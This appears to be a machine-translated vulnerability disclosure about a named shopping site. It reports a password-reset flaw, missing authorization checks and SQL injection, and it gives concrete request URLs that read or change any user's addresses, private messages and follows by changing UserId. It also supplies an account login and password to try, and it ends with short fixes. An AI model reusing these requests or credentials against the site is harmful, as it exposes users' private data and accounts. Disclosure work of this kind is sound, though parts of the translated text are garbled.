Arbitrary Password Reset + unauthorized access + SQL Injection
Arbitrary Password Reset + unauthorized access + SQL Injection
1. Reset any password ...... The verification code is in the return value (registration is the same, you can register any mobile phone number ).
2. unauthorized access. The entire software system has no permission settings, rather than excessive permissions. For example: 1) access this url. If the user ID is 100001, the shipping address is added.
Http://www.tootoojia.com/userAddress/AddAddress.htm? CityId = 2 & UserId = 100001 & DetailedAddress = wooyuntest & ProvinceId = 1 & DistrictId = 10 & RealName = % E5 % 93% E5 % 88% 88 & PhoneNumber = 93% & Postcode = 13888888888
2) read the contact information of any user
Http://www.tootoojia.com/userAddress/ShowAddressList.htm? UserId = 104853
3) read private messages and notifications from any user
Www.tootoojia.com/notice/noticeList.htm? Page = 1 & PageSize = 20 & UserId =
Www.tootoojia.com/mail/GetMailUserList.htm? Page = 1 & PageSize = 20 & UserId =
4) traverse the id to add attention to and brush fans
Www.tootoojia.com/friend/AddFriend.htm? FollowId = parameter 1 & UserId = parameter 2
There are too many. I will not list them one by one. You can also click like or invite here. 3. There are too many injection points. If there is a parameter, there is an injection. Here is an example: userid
Http://www.tootoojia.com/Contact/ShowContactList? UserId = 100000
Log on to the account 16888888882 (which means batch import to the database). The md5 password is 654123. Give it a try.
The User ID is 100001. The shipping address is added successfully.
Solution:
1. Do not display the SMS verification code in the returned value.
2. verify the validity of the user
3. filter parameters